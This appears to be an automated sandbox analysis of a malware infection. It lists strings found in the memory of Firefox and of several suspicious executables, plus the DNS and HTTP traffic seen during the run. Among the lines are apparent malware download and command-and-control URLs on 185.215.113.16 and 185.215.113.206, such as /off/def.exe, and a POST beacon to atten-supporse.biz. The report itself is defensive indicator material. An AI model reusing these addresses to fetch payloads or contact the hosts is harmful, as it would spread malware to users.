Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div 
class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3624693263.000001C23CCF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E088000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: unknown HTTP traffic detected:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/(
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: 79ddad050f.exe, 00000008.00000002.3287630527.00000000058E0000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262115190.0000000000EFB000.00000004.00000010.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exeData
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exek
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe8
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: e051bdf457.exe, 00000009.00000002.3254990045.00000000002D4000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://185.215.113.206
Source: e051bdf457.exe, 00000009.00000002.3265209742.0000000001308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/javascriptValidator
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mediaExceptionsStrategy
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/richSuggestionsFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/serpEventTelemetryEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAll
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingMaxResultsNoSearchMode
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingRequireSearchMode
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/useNewWizard
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
